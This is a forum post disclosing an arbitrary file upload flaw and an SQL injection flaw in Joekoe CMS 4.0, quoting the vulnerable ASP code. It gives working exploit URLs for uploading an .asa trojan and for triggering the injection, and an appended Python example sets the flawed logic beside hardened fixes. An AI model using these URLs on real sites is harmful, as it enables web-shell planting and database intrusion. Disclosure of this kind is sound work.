oma posted on 2011-12-20 09:47

joekoe CMS 4.0: two vulnerabilities

<P>Two high-risk vulnerabilities in Joekoe CMS 4.0<BR>&nbsp;&nbsp;&nbsp;&nbsp; A while ago I read through Joekoe and found two high-risk vulnerabilities in Joekoe 4.0: one is an upload vulnerability that lets you upload any file at all, including ASP; the other is SQL injection, which even returns the error messages. Scary.</P>
<P>&nbsp;&nbsp;&nbsp;&nbsp; Upload vulnerability:<BR>Look at the code in /common/include/web.upload.asp</P>
<P>----------------------------------------------------------------------</P>
<P>sub doPageLoad()<BR>if APP_STATUS="close" then<BR>&nbsp;&nbsp; treeData.addItem "_status","error.message"<BR>&nbsp;&nbsp; treeData.addItem "_message","网站暂时因关闭维护中!请稍候..."<BR>&nbsp;&nbsp; exit sub<BR>end if<BR>up.doInit()<BR>if not upConfig.isInit then<BR>&nbsp;&nbsp; treeData.addItem "_status","error.message"<BR>&nbsp;&nbsp; treeData.addItem "_message","上传文件的参数不正确!"<BR>else<BR>&nbsp;&nbsp; doPageLoadUser()<BR>&nbsp;&nbsp; select case upConfig.channel<BR>&nbsp;&nbsp; case "forum"<BR>&nbsp;&nbsp;&nbsp; upConfig.setSaveDir(upConfig.getSaveDir&amp;(left(ops.time.toConvertString("",10),6)&amp;DIR_SEPARATOR))<BR>&nbsp;&nbsp;&nbsp; upConfig.filename=""<BR>&nbsp;&nbsp; case "user.face"<BR>&nbsp;&nbsp;&nbsp; upConfig.filename="face_"&amp;upConfig.userid<BR>&nbsp;&nbsp;&nbsp; upConfig.setSaveDir("face"&amp;DIR_SEPARATOR)<BR>&nbsp;&nbsp;&nbsp; upConfig.filetype="gif"<BR>&nbsp;&nbsp; case "blog.logo"<BR>&nbsp;&nbsp;&nbsp; upConfig.setSaveDir("blog"&amp;DIR_SEPARATOR)<BR>&nbsp;&nbsp;&nbsp; upConfig.filetype="gif"<BR>&nbsp;&nbsp; case else<BR>&nbsp;&nbsp;&nbsp; ' any other channel: filetype is only set here when fileinput contains "url"; otherwise the value from the request stands<BR>&nbsp;&nbsp;&nbsp; if instr(upConfig.channel,".")&gt;0 then<BR>&nbsp;&nbsp;&nbsp;&nbsp; upConfig.setSaveDir(mid(upConfig.channel,1,instr(upConfig.channel,".")-1)&amp;DIR_SEPARATOR)<BR>&nbsp;&nbsp;&nbsp; end if<BR>&nbsp;&nbsp;&nbsp; if instr(upConfig.fileinput,"url")&gt;0 then<BR>&nbsp;&nbsp;&nbsp;&nbsp; upConfig.filetype="affix"<BR>&nbsp;&nbsp;&nbsp; end if<BR>&nbsp;&nbsp; end select<BR>&nbsp;&nbsp; if len(upConfig.getSaveDir())&lt;3 then<BR>&nbsp;&nbsp;&nbsp; treeData.addItem "_status","error.message"<BR>&nbsp;&nbsp;&nbsp; treeData.addItem "_message","上传文件的参数不正确!"<BR>&nbsp;&nbsp;&nbsp; exit sub<BR>&nbsp;&nbsp; end if<BR><BR>&nbsp;&nbsp; if 1=1 then<BR>&nbsp;&nbsp;&nbsp; upConfig.setData "zoom.channel.width",120<BR>&nbsp;&nbsp;&nbsp; upConfig.setData "zoom.channel.height",90<BR>&nbsp;&nbsp; end if<BR><BR>&nbsp;&nbsp; upConfig.setBaseDir(DIR_ROOT&amp;DIR_UPLOAD)<BR>&nbsp;&nbsp; upConfig.setBasePath(opsDirPath(DIR_ROOT&amp;DIR_UPLOAD))<BR>&nbsp;&nbsp; upConfig.setBaseURL(URL_UPLOAD)<BR>&nbsp;&nbsp; up.doLoad()<BR>end if<BR>end sub</P>
<P>----------------------------------------------------------------------</P>
<P>This code uses channel to decide whether to assign the upload type. When channel is not forum, user.face or blog.logo, it checks whether fileinput contains url; if it doesn't, upConfig.filetype is never assigned. Keep reading:</P>
<P>----------------------------------------------------------------------</P>
<P>&nbsp;&nbsp; if up.isPost() then<BR>&nbsp;&nbsp;&nbsp; call doParseUploadData()<BR>&nbsp;&nbsp;&nbsp; treeData.addItem "_status","succeed"<BR>&nbsp;&nbsp;&nbsp; dim tmpFormMode,tmpFileValue,tmpThumbValue<BR>&nbsp;&nbsp;&nbsp; tmpFormMode="set"<BR>&nbsp;&nbsp;&nbsp; if upConfig.channel="user.face" then<BR>&nbsp;&nbsp;&nbsp;&nbsp; tmpLinkMode="no"<BR>&nbsp;&nbsp;&nbsp;&nbsp; tmpFileValue="#"&amp;up.getFileInfo("filename")<BR>&nbsp;&nbsp;&nbsp; else<BR>&nbsp;&nbsp;&nbsp;&nbsp; tmpFileValue=up.getFileInfo("file.path")<BR>&nbsp;&nbsp;&nbsp;&nbsp; select case upConfig.filetype<BR>&nbsp;&nbsp;&nbsp;&nbsp; case "file"<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; tmpLinkMode="no"<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 'tmpFileValue=up.getFileInfo("file.path")<BR>&nbsp;&nbsp;&nbsp;&nbsp; case "pic","spic","pics","affix","gif","jpg","jpeg","bmp","png"<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; tmpLinkMode="no"<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; tmpThumbValue=up.getFileInfo("thumb.path")<BR>&nbsp;&nbsp;&nbsp;&nbsp; case else<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ' reached whenever upConfig.filetype was never assigned server-side<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; tmpLinkMode="again"<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; tmpFormMode="append"<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; dim tmpFileType:tmpFileType=lcase(up.getFileInfo("filetype"))<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; select case tmpFileType<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; case "gif","jpg","jpeg","bmp","png"<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; tmpFileValue=""<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; case "swf"<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; tmpFileValue=""<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; case else<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; tmpFileValue="upload_download.asp?id="&amp;upConfig.fileid&amp;""<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; end select<BR>&nbsp;&nbsp;&nbsp;&nbsp; end select<BR>&nbsp;&nbsp;&nbsp; end if<BR>&nbsp;&nbsp;&nbsp; treeData.addItem "_form.mode",tmpFormMode<BR>&nbsp;&nbsp;&nbsp; treeData.addItem "_form.filevalue",tmpFileValue<BR>&nbsp;&nbsp;&nbsp; treeData.addItem "_form.thumbvalue",tmpThumbValue<BR>&nbsp;&nbsp; end if</P>
<P>----------------------------------------------------------------------</P>
<P>This code checks upConfig.filetype and from that defines the uploaded file's extension. As long as upConfig.filetype was not assigned earlier, and it is not gif, jpg, jpeg, bmp, png or swf, it does tmpFileValue="upload_download.asp?id="&amp;upConfig.fileid&amp;"". Seeing this, everyone's eyes light up: deciding the upload type from the user's own definition is like asking someone about to steal, "Are you a thief?" This code is just too XX; I guess quite a few people had already read this out, they just never published it.</P>
<P><BR>&nbsp;&nbsp;&nbsp;&nbsp; SQL injection vulnerability<BR>Still in web.upload.asp:<BR>----------------------------------------------------------------------</P>
<P>...........<BR>sub doParseUploadData()<BR>dim tmpFilePath,tmpFileType,tmpFileSize,tmpName<BR>tmpFilePath=up.getFileInfo("file.path")<BR>tmpFileType=up.getFileInfo("filetype")<BR>tmpFileSize=opsCommon.toInt(up.getFileInfo("filesize"))<BR>tmpName=up.getFileInfo("name")<BR>dim tmpChannel,tmpDataid,tmpType,tmpSQL,tmpID<BR>tmpChannel=upConfig.channel<BR>tmpDataid=0<BR>tmpType=0<BR>select case upConfig.channel<BR>case "user.face"<BR>&nbsp;&nbsp; tmpDataid=upConfig.userid<BR>&nbsp;&nbsp; tmpChannel="face"<BR>&nbsp;&nbsp; tmpType=1<BR>&nbsp;&nbsp; tmpSQL="select top 1 u_id from db_sys_upload where nsort='"&amp;tmpChannel&amp;"' and iid="&amp;tmpDataid&amp;""<BR>case "blog.logo"<BR>&nbsp;&nbsp; tmpDataid=toInt(ops.client.getSession("user.blogid"))<BR>&nbsp;&nbsp; if tmpDataid&lt;1 then tmpDataid=upConfig.userid<BR>&nbsp;&nbsp; tmpChannel="blog"<BR>&nbsp;&nbsp; tmptype=1<BR>&nbsp;&nbsp; tmpSQL="select top 1 u_id from db_sys_upload where nsort='"&amp;tmpChannel&amp;"' and iid="&amp;tmpDataid&amp;""<BR>case else<BR>&nbsp;&nbsp; ' tmpFilePath is concatenated into the statement without escaping or a parameter<BR>&nbsp;&nbsp; tmpSQL="select top 1 u_id from db_sys_upload where u_url='"&amp;tmpFilePath&amp;"'"<BR>end select<BR>..........</P>
<P>----------------------------------------------------------------------</P>
<P>Look at this line: tmpSQL="select top 1 u_id from db_sys_upload where u_url='"&amp;tmpFilePath&amp;"'". u_url comes from &amp;tmpFilePath&amp;, and &amp;tmpFilePath&amp; comes from up.getFileInfo("file.path"). Heh, it goes straight into the SQL query without passing through any filtering at all.</P>
<P>Exploitation:<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1. Upload vulnerability: very easy to exploit. Change the channel variable so that it is anything other than forum, user.face or blog.logo, then change filetype to asa, and you can upload a trojan in broad daylight. The specific url can be like this: common/upload.asp?channel=use&amp;filetype=asa&amp;filename=&amp;fileinput=u_face&amp;formname=&amp;thumbname=&amp;thumbinput=, then upload.</P>
<P>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 2. SQL injection vulnerability: put something like a statement into the Channel variable, for example: common/upload.asp?channel=use'&amp;filetype=gif&amp;filename=&amp;fileinput=u_face&amp;formname=&amp;thumbname=&amp;thumbinput=, then upload, and it reports an error:<BR>----------------------------------------------------------------------</P>
<P>Joekoe CMS 4.0<BR>错误信息:<BR>select top 1 u_id from db_sys_upload where u_url='user'/20070722031234c.gif'<BR>原始错误:<BR>Error #-2147217900, 第 1 行: 'c' 附近有语法错误。 Microsoft OLE DB Provider for SQL Server<BR>返回首页<BR>Processed in 0.188 s, 1 queries, 54 Cache.</P>
<P>*-------------------------</P>
<P>Tried it myself.. the upload works with no problem..</P>
<P>The SQL part after that.. seems to be of no use any more!! Try it yourself</P>
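<P>The two defects the post walks through, as an added Python example that is not part of the post and not Joekoe's own code. resolve_filetype_as_posted mirrors the filetype decision in doPageLoad() above (only user.face, blog.logo and a fileinput containing "url" set the type server-side; every other channel keeps whatever value the request supplied), and resolve_filetype_hardened shows the corrected shape: the extension is taken from the name the server itself will store and checked against a server-side allow-list. The second half rebuilds the db_sys_upload lookup from doParseUploadData() with the same string concatenation, beside a parameterised query. The allow-list (ALLOWED_EXTENSIONS, IMAGE_ONLY_CHANNELS), the SQLite table, its single row and the path containing a quote are all constructed for this example; SQLite stands in for SQL Server, so "top 1" is written as "limit 1".</P>

```python
import sqlite3

# Constructed for this example: the extensions a server should be willing
# to store. Joekoe has no such list; that absence is the defect the post describes.
ALLOWED_EXTENSIONS = {"gif", "jpg", "jpeg", "png", "bmp", "swf"}
IMAGE_ONLY_CHANNELS = {"user.face", "blog.logo"}


def resolve_filetype_as_posted(channel, fileinput, requested_filetype):
    """Mirror of the filetype decision in doPageLoad() from the post.

    Only user.face, blog.logo and a fileinput containing "url" assign the
    type server-side; every other channel keeps the request's own value.
    """
    if channel in IMAGE_ONLY_CHANNELS:
        return "gif"
    if channel != "forum" and "url" in fileinput:
        return "affix"
    return requested_filetype  # request parameter survives untouched


def resolve_filetype_hardened(channel, stored_name):
    """Hardened version (an assumption, not Joekoe's code): the extension is
    read from the name the server will write and checked against an
    allow-list; the request's filetype parameter is never consulted.
    Returns None when the upload must be refused."""
    base, dot, ext = stored_name.rpartition(".")
    ext = ext.lower() if dot and base else ""  # "file" or ".asa" -> refused
    if channel in IMAGE_ONLY_CHANNELS:
        return "gif" if ext == "gif" else None
    return ext if ext in ALLOWED_EXTENSIONS else None


def open_sample_db():
    """In-memory stand-in for db_sys_upload with one constructed row."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "create table db_sys_upload (u_id integer, nsort text, iid integer, u_url text)"
    )
    conn.execute(
        "insert into db_sys_upload values (7, 'user', 0, 'user/20070722031234c.gif')"
    )
    return conn


def lookup_upload_as_posted(conn, file_path):
    """Same string concatenation as doParseUploadData(); a quote inside
    file_path becomes part of the statement the database parses."""
    sql = "select u_id from db_sys_upload where u_url='" + file_path + "' limit 1"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def lookup_upload_hardened(conn, file_path):
    """Parameterised query: the path is bound as data, never parsed as SQL."""
    row = conn.execute(
        "select u_id from db_sys_upload where u_url=? limit 1", (file_path,)
    ).fetchone()
    return row[0] if row else None


def concatenation_breaks(conn, file_path):
    """True when the concatenated statement fails to parse, i.e. the database
    treated part of the path as SQL; this is the error page the post shows."""
    try:
        lookup_upload_as_posted(conn, file_path)
        return False
    except sqlite3.Error:
        return True


if __name__ == "__main__":
    print(resolve_filetype_as_posted("use", "u_face", "asa"))  # the request's value wins
    print(resolve_filetype_hardened("use", "shell.asa"))  # None: refused
    conn = open_sample_db()
    bad_path = "user'/20070722031234c.gif"  # constructed, shaped like the post's error
    print(concatenation_breaks(conn, bad_path))  # True
    print(lookup_upload_hardened(conn, bad_path))  # None, and no error
    print(lookup_upload_hardened(conn, "user/20070722031234c.gif"))  # 7
```

<P>The hardened lookup returns no row for the quoted path instead of an error, which is the observable difference: with a bound parameter the quote is compared as a character in u_url, so the database never sees a malformed statement and the error page that revealed the query text disappears.</P>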